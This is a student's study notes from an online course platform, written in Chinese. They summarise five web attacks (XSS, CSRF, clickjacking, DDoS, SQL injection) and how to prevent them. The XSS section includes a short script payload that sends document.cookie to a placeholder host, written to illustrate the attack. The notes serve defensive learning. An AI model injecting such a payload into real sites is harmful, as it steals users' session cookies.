继续浏览精彩内容
慕课网APP
程序员的梦工厂
打开
继续
感谢您的支持,我会继续努力的
赞赏金额会直接到老师账户
将二维码发送给自己后长按识别
微信支付
支付宝支付

【九月打开】第13天 前端攻击手段有哪些,如何预防?

一米阳光0704
关注TA
已关注
手记 23
粉丝 11
获赞 7

第一模块(课程信息):

课程名称:2周刷完100道前端优质面试真题
课程章节:第六章第十四节 前端攻击手段有哪些,该如何预防?
主讲老师:双越

第二模块(课程内容):

课程内容概述

预防前端攻击到底前端做还是后端做?两个人不可以踢皮球,谁也推卸不了责任,不可以独善其身。
前端可以做前端的预防攻击,后端做后端的预防攻击,可以用特殊字符替换的方式。

一、XSS攻击

  • Cross Site Script跨站脚本攻击
  • 手段:黑客将js代码插入到网页内容中,渲染时执行js代码
  • 预防:特殊字符替换(前端或者后端)
<script>
var img = document.createElement('image');
img.src='https://xxx.com/api/xxx?cookie='+document.cookie
</scropt>

vue和react能够默认屏蔽掉xss攻击
vue:v-html除外
react:dangerouslySetInnerHTML***除外

二、CSRF

  • Cross Site Request Forgery 跨站请求伪造
  • 手段:黑客诱导用户访问另一个网站的接口,伪造请求
  • 预防:严格的跨域验证+验证码机制

详细过程

  • 用户登录A网站,有了cookie
  • 黑客诱导到B网站,并发起A网站的请求
  • A网站发现API有cookie,认为是用户自己操作的

预防手段:

  • 严格的跨域请求限制,判断referrer(请求来源)
  • 为cookie设置SameSite,禁止跨域传递cookie

三、点击劫持

  • Click Jacking
  • 手段:诱导界面上蒙一个透明的iframe,诱导用户点击
  • 预防:让iframe不能跨域加载

四、DDos

  • Distribute denial-of-service分布式拒绝服务
  • 手段:分布式的、大规模的流量访问,使服务器瘫痪
  • 预防:需要硬件预防,如阿里云的WAF

五、SQL注入

  • 手段:黑客提交内容时写入SQL语句,破坏数据库
  • 预防:处理输入的内容,替换特殊字符

第三模块(学习心得):

学习了5种前端攻击的手段和预防方法。

  1. XSS
  2. CSRF
  3. 点击劫持
  4. DDos
  5. SQL注入

第四模块(学习截图):

图片描述
图片描述
图片描述
图片描述

打开App,阅读手记
0人推荐
发表评论
随时随地看视频慕课网APP